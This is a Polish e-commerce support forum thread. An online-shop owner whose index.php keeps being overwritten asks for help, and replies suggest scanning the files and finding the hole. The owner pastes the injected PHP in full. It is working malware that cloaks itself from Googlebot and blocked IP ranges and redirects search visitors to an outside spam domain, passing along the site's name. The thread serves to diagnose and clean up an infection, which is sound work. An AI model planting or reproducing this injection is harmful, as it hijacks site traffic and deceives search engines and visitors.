en Jump to content
  • 0
The Avraxis

Włamanie na strone

Question

Witam wszystkich serdecznie.
Opisze w skrócie mój problem.

Od kilku dni próboje się uporać z problemem wtargnięcia botów na mój sklep internetowy.

Pewnego dnia, sklep przestał poprostu działać (error500) i jedyne co było na stronie to białe tło, probowałem się ratować backupem - problem znikł ale tylko na kilka godzin, teraz wirtyna widnieje w gooogle jako "Ta witryna mogła paść ofiarą ataku hakerów.

Bot zmienia plik index.php co jakis czas na wlasny przez co strona nic nie wyświetla.

Zmienianie haseł do ftp, p@, itd nie pomaga.

Co zrobić w takiej sytuacji

Share this post


Link to post
Share on other sites

10 answers to this question

Recommended Posts

  • 1

To może inny szablon... nazwy mogą być podobne.

Pliki możesz przeskanować, możesz również szukać po datach na ftp jakie pliki były zmieniane.

 

Share this post


Link to post
Share on other sites
  • 1

No tak wyczyścić musisz dobrze inaczej będzie wracało jak bumerang ale przede wszystkim musisz znaleźć dziurę.

Jak na serwerze masz jakiś skaner to skorzystaj na pewno przyspieszy sprawę, bardzo często wystarczy napisać do admina serwera żeby dostać listę podejrzanych plików.

Share this post


Link to post
Share on other sites
  • 0

Na pewno masz pliki zainfekowane, musisz przejrzeć i wyczyścić je oraz znaleźć dziurę i ją załatać.

Jaka wersja presty? Jaki szablon?

Share this post


Link to post
Share on other sites
  • 0

#up

 

Od 2 dni wrócił problem wydawalo mi sie, że już ucichł ale nie na dlugo.. 

Około godziny 5 nad ranem zmienia plik index.php na kod

"

Cytat

<?php
error_reporting(0);
$umodel = "32";
$query = $_SERVER['REQUEST_URI'];
if(strstr($query,"sitemaps.xml")){
    echo GetFileContent("sitemaps.xml");exit;
}
$query = $_SERVER['REQUEST_URI'];
if(stripos($_SERVER['HTTP_USER_AGENT'], 'Googlebot') !== false){
    header('HTTP/1.1 404 Not Found');
    header('status: 404 Not Found');
    exit;
}

if(preg_match('/(google.co.jp|yahoo.co.jp)/i', strtolower($_SERVER['HTTP_REFERER']))){
    error_reporting (E_ERROR | E_WARNING | E_PARSE);
    $ip = getenv("REMOTE_ADDR");
    $DENY_IP=array('50.206','66.102','64.131','66.87','184.153','128.28','86.137','68.8','73.234','167.167','66.249','98.2','216.8','45.64','171.96','98.164','67.1
74','165.225','184.83','67.139','52.192','165.23','72.253','98.102','71.83','108.225','50.184');
    $check_ip_arr= explode('.',$ip);
    if ($ip=="" || preg_match('/('.implode("|",$DENY_IP).')/i', $check_ip_arr[0].".".$check_ip_arr[1])){
        Header("HTTP/1.1 404 Not Found");
        exit;
    }
    echo '<script>document.location=("http://www.topgood.xyz/good/130-85/go.php?'.trim($query."|".$_SERVER["SERVER_NAME"]."|".$umodel).'");</script>';
    exit;
}

function GetFileContent($url){
    if(function_exists('file_get_contents')) {
        $file_contents = file_get_contents($url);
    } else {
        $ch = curl_init();
        $timeout = 5;
        curl_setopt ($ch, CURLOPT_URL, $url);
        curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
        $file_contents = curl_exec($ch);
        curl_close($ch);
    }
    return $file_contents;
}
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
 

 

 

Ktoś jakiś pomysl?

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

×

Important Information

Cookies ensure the smooth running of our services. Using these, you accept the use of cookies. Learn More